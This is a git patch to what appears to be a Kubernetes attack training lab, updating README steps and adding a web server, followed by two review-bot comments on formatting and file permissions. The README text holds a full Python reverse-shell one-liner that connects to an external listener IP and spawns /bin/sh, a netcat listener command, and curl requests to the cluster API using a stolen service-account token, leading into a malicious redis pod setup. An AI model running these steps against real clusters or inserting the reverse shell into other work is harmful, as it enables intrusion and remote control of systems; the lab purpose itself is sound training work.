From 4708fd0e2fb9388ab9023ee44599c9b8b3aa13c4 Mon Sep 17 00:00:00 2001 From: nithinjois Date: Fri, 21 Sep 2018 17:11:55 +0530 Subject: [PATCH] Minor changes in README and added tornado_server.py in K8s-Cluster-Attack directory --- .../K8s-Cluster-Attack/README.md | 21 +++++++++++++++---- .../malicious_pods/malicious-redis-slave.json | 4 ++-- .../K8s-Cluster-Attack/tornado_server.py | 16 ++++++++++++++ .../PodSecurityPolicy/README.md | 4 ++-- 4 files changed, 37 insertions(+), 8 deletions(-) create mode 100644 K8s-Attacking-a-K8s-cluster/K8s-Cluster-Attack/tornado_server.py diff --git a/K8s-Attacking-a-K8s-cluster/K8s-Cluster-Attack/README.md b/K8s-Attacking-a-K8s-cluster/K8s-Cluster-Attack/README.md index 78bce6f..964b4b3 100644 --- a/K8s-Attacking-a-K8s-cluster/K8s-Cluster-Attack/README.md +++ b/K8s-Attacking-a-K8s-cluster/K8s-Cluster-Attack/README.md @@ -78,7 +78,7 @@ Server: nginx/1.11.13 * you should be in the payloads directory. Open `reverse_shell.yml` with `atom reverse_shell.yml` * change the external IP address to your VM's IP address with ifconfig. Also make sure that port 1337 is available on your VM `["echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.2.3\",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);' > shell.py && python shell.py &"]` -* open a separate terminal and start your netcat listener. +* open a separate terminal and start your netcat listener by running `nc -l 1337` * Now run: ``` 
@@ -114,9 +114,21 @@ Now you can interact with your target app and backend K8s cluster * Let's start interacting with K8s API `curl -s https://10.96.0.1/api/v1/namespaces/default/pods -XGET -H "Authorization: Bearer $TOKEN" -H "Content-Type: application/json" --insecure` + `curl -s https://10.96.0.1/api/v1/namespaces/default/services -XGET -H "Authorization: Bearer $TOKEN" -H "Content-Type: application/json" --insecure` -You should see a JSON Dump of all the pods running in the cluster at this time +You should see a JSON Dump of all the pods and services running in the cluster at this time + +Note `clusterIP` of the `redis-service` Service. + +Open a new tab in terminal and launch a web-server by running `./tornado_server.py` + +Change the value of `MASTERHOST` with the value of `clusterIP`. + +Change the value of `LISTENER_IP` with the VM IP that can be fetched by running `ifconfig` + +Change the value of `LISTENER_PORT` to the port web-server is running on(`9090`) + ``` cat > mal-redis.json < mal-redis.json <
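Review bot: In the README hunk at `@@ -78,7 +78,7`, the new listener bullet gives `nc -l 1337` without saying which netcat variant the lab VM ships. The flag syntax for listening on a port differs between netcat variants, so the command may not work as written for every reader. Name the variant or package the lab expects next to the command. The bullet also starts in lowercase and has no end punctuation, while the following `* Now run:` bullet is capitalized; pick one style for the list.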
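Review bot: In the README hunk at `@@ -114,9 +114,21`, the added step tells the reader to run `./tornado_server.py`, but the diffstat creates that file with `create mode 100644`, so it is not executable and the command will fail with a permission error on a fresh checkout. Either commit the file with the executable bit set or document the step as running the script through the Python interpreter. The three `Change the value of ...` lines do not name the file that holds `MASTERHOST`, `LISTENER_IP` and `LISTENER_PORT`; state which file to edit, and write "to" rather than "with". The summary line now says "all the pods and services running in the cluster", but both requests are scoped to `/api/v1/namespaces/default/`, so it should say the default namespace.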